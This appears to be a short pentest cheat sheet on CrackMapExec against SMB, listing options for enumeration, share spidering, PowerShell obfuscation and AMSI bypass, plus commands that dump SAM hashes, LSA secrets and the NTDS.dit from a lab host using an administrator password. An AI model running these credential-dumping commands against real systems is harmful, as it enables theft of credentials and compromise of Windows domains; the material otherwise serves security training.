CrackMapExec SMB: Hacking Samba service

CrackMapExec SMB: Hacking Samba service

Mapping/Enumeration

Options for Mapping/Enumerating

  --shares              enumerate shares and access
  --sessions            enumerate active sessions
  --disks               enumerate disks
  --loggedon-users-filter LOGGEDON_USERS_FILTER
                        only search for specific user, works with regex
  --loggedon-users      enumerate logged on users
  --users [USER]        enumerate domain users, if a user is specified than only its information is queried.
  --groups [GROUP]      enumerate domain groups, if a group is specified than its members are enumerated
  --computers [COMPUTER]
                        enumerate computer users
  --local-groups [GROUP]
                        enumerate local groups, if a group is specified then its members are enumerated
  --pass-pol            dump password policy
  --rid-brute [MAX_RID]
                        enumerate users by bruteforcing RID's (default: 4000)
  --wmi QUERY           issues the specified WMI query
  --wmi-namespace NAMESPACE
WMI Namespace (default: root\cimv2)

Credential Gathering

Options for gathering credentials

  --enabled             Only dump enabled targets from DC
  --user USERNTDS       Dump selected user from DC
  --sam                 dump SAM hashes from target systems
  --lsa                 dump LSA secrets from target systems
  --ntds [{drsuapi,vss}] dump the NTDS.dit from target DCs using the
   specifed method (default: drsuapi)

Dumping SAM database

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --sam

Dumping LSA Database

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --lsa

Dumping NTDS - DRSUAPI

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds drsuapi

Dumping NTDS - VSS

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds vss

Spidering

Options for spidering shares

  --spider SHARE        share to spider
  --spider-folder FOLDER
                        folder to spider (default: root share directory)
  --content             enable file content searching
  --exclude-dirs DIR_LIST
                        directories to exclude from spidering
  --pattern PATTERN [PATTERN ...]
                        pattern(s) to search for in folders, filenames and file content
  --regex REGEX [REGEX ...]
                        regex(s) to search for in folders, filenames and file content
  --depth DEPTH         max spider recursion depth (default: infinity & beyond)
  --only-files          only spider files
--spider SHARE share to spider
--spider-folder FOLDER
folder to spider (default: root share directory)
--content enable file content searching
--exclude-dirs DIR_LIST
directories to exclude from spidering
--pattern PATTERN [PATTERN ...]
pattern(s) to search for in folders, filenames and file content
--regex REGEX [REGEX ...]
regex(s) to search for in folders, filenames and file content
--depth DEPTH max spider recursion depth (default: infinity & beyond)
--only-files only spider files

Powershell Obfuscation

Options for PowerShell script obfuscation

  --obfs                Obfuscate PowerShell scripts
  --amsi-bypass FILE    File with a custom AMSI bypass
  --clear-obfscripts    Clear all cached obfuscated PowerShell scripts

Reverse Shells

CrackMapExec Samba Modules

crackmapexec smb -L

Did you find this article valuable?

Support PopLabSec by becoming a sponsor. Any amount is appreciated!